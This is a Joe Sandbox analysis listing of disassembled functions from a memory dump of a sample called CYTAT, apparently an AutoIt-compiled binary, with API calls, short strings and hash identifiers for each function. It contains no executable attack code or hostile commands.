                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                • String ID:
                                                • API String ID: 1454798553-0
                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _strncmp
                                                • String ID: Q\E
                                                • API String ID: 909875538-2189900498
                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 2652923123-3941886329
                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: U$\
                                                • API String ID: 2666721431-100911408
                                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                • String ID: LPT
                                                • API String ID: 3035604524-1350329615
                                                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$h
                                                • API String ID: 4104443479-677774858
                                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: &
                                                • API String ID: 2931989736-1010288
                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00466825
                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CrackInternet_wcslen
                                                • String ID: |
                                                • API String ID: 596671847-2343686810
                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                Download Yara Rule
                                                APIs
                                                • _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$_sprintf_strlen
                                                • String ID: %02X
                                                • API String ID: 1921645428-436463671
                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: htonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 3832099526-2422070025
                                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID: <local>
                                                • API String ID: 2038078732-4266983199
                                                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
